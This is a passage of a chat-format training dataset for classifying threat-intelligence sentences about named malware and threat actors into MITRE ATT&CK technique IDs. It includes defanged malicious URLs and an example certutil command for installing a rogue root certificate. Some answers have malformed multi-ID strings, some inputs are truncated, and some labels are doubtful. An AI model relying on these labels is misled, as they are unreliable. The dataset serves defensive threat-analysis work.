- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkComet can disable Security Center functions like anti-virus."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PcShare has used an invalid certificate in attempt to appear legitimate."
- },
- {
- "role": "assistant",
- "content": "T1036.001 - Invalid Code Signature"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Avenger has the ability to browse files in directories such as Program Files and the Desktop."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SLOWDRIFT downloads additional payloads."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is known to utilize encryption within network protocols."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Turian can insert pseudo-random characters into its network encryption setup."
- },
- {
- "role": "assistant",
- "content": "T1001.001 - Junk Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Elderwood has packed malware payloads before delivery to victims."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Flagpro has the ability to wait for a specified time interval between communicating with and executing commands from C2."
- },
- {
- "role": "assistant",
- "content": "T1029 - Scheduled Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Group has used the Plink utility to create SSH tunnels."
- },
- {
- "role": "assistant",
- "content": "T1572 - Protocol Tunneling', 'T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pasam creates a backdoor through which remote attackers can retrieve lists of running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers and beacons the operating system build number and CPU Architecture (32-bit/64-bit) during installation."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "P8RAT can send randomly-generated data as part of its C2 communication."
- },
- {
- "role": "assistant",
- "content": "T1001.001 - Junk Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNSPOT appends an entry in the log file with the date and time of the backdoor attempt and waits for the MsBuild.exe process to exit before restoring the original source code and deleting the temporary InventoryManager.bk file. If the Orion solution build is successful, it is backdoored with SUNBURST"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FunnyDream has used a service named `WSearch` for execution."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has obtained and used publicly-available post-exploitation frameworks and tools like Metasploit, Empire, Mimikatz."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADFLICK has download files from its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A malware variant named Mal/Miner-C (also known as PhotoMiner) is infecting Internet-exposed Seagate Central Network Attached Storage (NAS) devices and using them to infect connected computers to mine for the Monero cryptocurrency"
- },
- {
- "role": "assistant",
- "content": "T1080 - Taint Shared Content"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro also employs a technique for privilege escalation described in more detail here. The method relies on registering a binary as the default handler for .MSC files and then running such a file"
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "They renamed their files to make them look like legitimate files, for example, KB77846376.exe, named after Microsoft update files. They routinely used standard tools that would mimic legitimate administrator activities. When planting webshells on the Outlook Exchange servers, they modified already existing legitimate flogon.js and logoff.aspx files. They relied on encrypted SSH-based tunnels to transfer tools and for remote command/program execution. They used multiple staging folders and opted to use directories that were used infrequently by legitimate users or processes. They routinely deleted dropped attack tools, execution logs, files staged for exfiltration, and other files after they were finished with them. They renamed their tools' filenames in the staging folder so that it would not be possible to identify the malware's purpose, even after it was deleted from the disk through the residual artifacts (e.g. ShimCache entries or WMI Recently Used Apps). - They used timestomping to modify the $STANDARD_INFORMATION attribute of the attack tools"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DCRat will also drop a .bat file containing a script that runs the W32tm “stripchart” command on the compromised host. This command is used as a delay tactic for its execution and beaconing."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The initial routine decrypts selected parts of the code section using XOR with a hardcoded value"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cyclops Blink has the ability to download files to target systems."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can enumerate drives and their types. It can also change file permissions using cacls.exe."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pupy can execute Lazagne as well as Mimikatz using PowerShell."
- },
- {
- "role": "assistant",
- "content": "T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PyDCrypt has attempted to execute with WMIC."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FireEye Research Labs, the intelligence behind our Mandiant Consultancy services, identified a new Internet Explorer (IE) zero-day exploit used in targeted attacks. The vulnerability affects IE6 through IE11, but the attack is targeting IE9 through IE11. Microsoft has assigned CVE-2014-1776 to the vulnerability and released security advisory to track this issue"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gold Dragon enumerates registry keys with the command \"regkeyenum\" and obtains information for the Registry key \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\"."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This watchdog process also ensures that the Cardinal RAT process is always running, as well as ensures that the executable is located in the correct path. Should either of these conditions not be met, the watchdog process will spawn a new instance of Cardinal RAT, or write Cardinal RAT to the correct location, respectively"
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang has used implants capable of collecting the signed-in username."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OopsIE uses HTTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This decrypted data is written to the following location: %TEMP%\\WUpdate.~tmp This ‘WUpdate.~tmp’ file is then copied to a filename of ‘Applet.cpl’, which is placed in the previously identified file path"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1074 - Data Staged"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In order to meet the phishing emails’ infrastructure requirements, disposable domains and emails were used as the delivery medium. On occasions, the phishing emails contained links to external domains to download the first stage, and sometimes the first stage was attached to the email itself"
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shamoon creates a new service named “ntssrv” that attempts to appear legitimate; the service's display name is “Microsoft Network Realtime Inspection Service” and its description is “Helps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols.” Newer versions create the \"MaintenaceSrv\" service, which misspells the word \"maintenance.\""
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADNEWS has a command to download an .exe and execute it via CreateProcess API. It can also run with ShellExecute."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MoonWind completes network communication via raw sockets."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERSTATS can use VBScript (VBE) code for execution."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 used WMI for the remote execution of files for lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShadowPad has sent data back to C2 every 8 hours."
- },
- {
- "role": "assistant",
- "content": "T1029 - Scheduled Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The first layer of the FYAnti loader decrypts an embedded .NET module and executes it using the CppHostCLR technique. The .NET module is packed using “ConfuserEx v1.0.0” and acts as yet another loader that searches for a file in the “C:\\Windows\\Microsoft.NET\\” directory with file sizes between 100,000 and 500,000"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing', 'T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Darkhotel has used malware that searched for files with specific patterns."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The link “Check” led to a Google Docs page, which contained a link that redirected to a ZIP file. The ZIP file was hosted on a likely compromised SharePoint account and contained Domenus VBS, which downloads Harpy from https[:]//fashionableeder[.]com/info. At one victim, CARBON SPIDER subsequently deployed the aforementioned custom PS Sekur stager and profiled the Active Directory environment using the utility ADFind"
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Unknown Logger can obtain information about the victim's IP address."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has delivered malicious links and macro-enabled documents that required targets to click the \"enable content\" button to execute the payload on the system."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Exaramel for Linux has a command to download a file from and to a remote C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to install browser root certificates as a precursor to performing man-in-the-middle between connections to banking websites. Example command: certutil -addstore -f -user ROOT ProgramData\\cert512121.der."
- },
- {
- "role": "assistant",
- "content": "T1553.004 - Subvert Trust Controls: Install Root Certificate"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MuddyWater has used \"cmd.exe net user /domain\" to enumerate domain users."
- },
- {
- "role": "assistant",
- "content": "T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has used WMI event subscriptions for persistence."
- },
- {
- "role": "assistant",
- "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fysbis has masqueraded as trusted software rsyncd and dbus-inotifier."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has used repeated MFA requests to gain access to victim accounts."
- },
- {
- "role": "assistant",
- "content": "T1621 - Multi-Factor Authentication Request Generation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet sends compromised victim information via HTTP."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUGARDUMP using SMTP for C2 communication – dated to late 2021-early 2022. This variant was downloaded from a known UNC3890 C2 (URL: hxxp://128.199.6[.]246/3-Video-VLC.exe), and is a slightly more advanced version with similar credential harvesting functionality. "
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leviathan has obtained valid accounts to gain initial access."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed can find and collect data from removable media devices."
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Also, on some infected computers we found a tool called the Winexesvc tool. The main difference is that the Winexesvc tool enables the execution of remote commands from Linux-based operating system. When the Linux binary “winexe” is run against a Windows server, the winexesvc.exe executable is created and installed as a service"
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If there are keys for the string encryption with the XOR algorithm, the configuration data will be also encrypted with the XOR algorithm"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoshC2 contains a module for recursively parsing through files and directories to gather valid credit card numbers."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "websites visitors have a higher likelihood to be targets of interest) - Add one or more webshell backdoors to victim websites to maintain persistence - Webshell used to add JavaScript developed by OceanLotus into the website - The malicious JavaScript makes calls over HTTP or HTTPS to attacker controlled domains to typically load one of two different OceanLotus frameworks - OceanLotus JavaScript frameworks designed to track, profile, and target the compromised website's visitors - Website visitors of interest are flagged for targeting and receive special JavaScript aimed at compromising the user's system or e-mail accounts"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used fragmented strings, environment variables, standard input (stdin), and native character-replacement functionalities to obfuscate commands."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Seasalt creates a Registry entry to ensure infection after reboot under \"HKLM\\Software\\Microsoft\\Windows\\currentVersion\\Run\"."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has downloaded second stage malware from compromised websites."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro can determine the IP and physical location of the compromised host via IPinfo."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This file issued a GET request to download a malicious file from: hxxp://94.23.172.164/dupdatechecker.doc"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rover automatically searches for files on local drives based on a predefined list of file extensions."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SynAck can manipulate Registry keys."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UPPERCUT has used HTTP for C2, including sending error codes in Cookie headers."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Darkhotel malware can obtain system time from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lizar can execute PE files in the address space of the specified process."
- },
- {
- "role": "assistant",
- "content": "T1055.002 - Process Injection: Portable Executable Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LOWBALL abuses the Dropbox cloud storage service for command and control (CnC)"
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNBURST delivered different payloads, including TEARDROP in at least one instance."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole has used Windows services as a way to execute its malicious payload."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HOPLIGHT has used svchost.exe to execute a malicious DLL ."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DOGCALL is capable of leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex for C2."
- },
- {
- "role": "assistant",
- "content": "T1102.002 - Bidirectional Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
